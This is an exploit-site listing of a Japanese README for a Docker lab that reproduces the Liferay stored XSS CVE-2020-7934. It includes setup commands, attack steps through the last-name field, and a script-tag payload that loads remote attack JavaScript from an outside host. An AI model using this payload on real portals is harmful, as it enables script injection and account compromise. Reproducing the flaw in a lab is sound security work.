Sploitus

Exploit for audit-xss

kitploit · 2026-08-31

Exploit Code

MARKDOWN33 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-GIARDINAS-DEV-AUDIT-XSS-CVE-2020-7934
# CVE 2020-7934

## CVEの実行方法

### 必要条件

  1. docker



### 備考

攻撃スクリプトをオンラインに配置することが可能です(JSコードを指定) http://yourjavascript.com/ 攻撃用のオンラインJSスクリプト `html <script src="http://yourjavascript.com/920172199111/attack.js"></script> `

### 設定コマンド

  1. このプロジェクトのルートフォルダに移動する
  2. "sudo docker-compose up --build" を実行する
  3. 新しいターミナル: "docker inspect liferay" を実行する ==> そして IPAddress の値をコピーする
  4. 新しいターミナル: "python api_attacker.py" を実行する
  5. ブラウザを開き、"http://IPAddress:8080" にアクセスする ==> liferay ポータルが応答として表示されるはずです
  6. コンテナを停止・削除するには "sudo docker-compose rm" を使用する



### 攻撃手順

  1. liferay にユーザーとして登録し、ログインし、「利用可能なサイト」セクションで「liferay」サイトに参加する。
  2. JSスクリプト内の「姓」を変更する(直接()または「src = "http ..."」を通じて)
  3. 管理者 liferay としてログインする(ユーザー名: some-email@example.com、パスワード: test)
  4. 利用可能なサイトに移動し、「liferay」をクリックすると、このサイトの公開ページが開く。
  5. 新しいページに移動すると、右側にメニューが開くので、「メンバーシップ」をクリックする。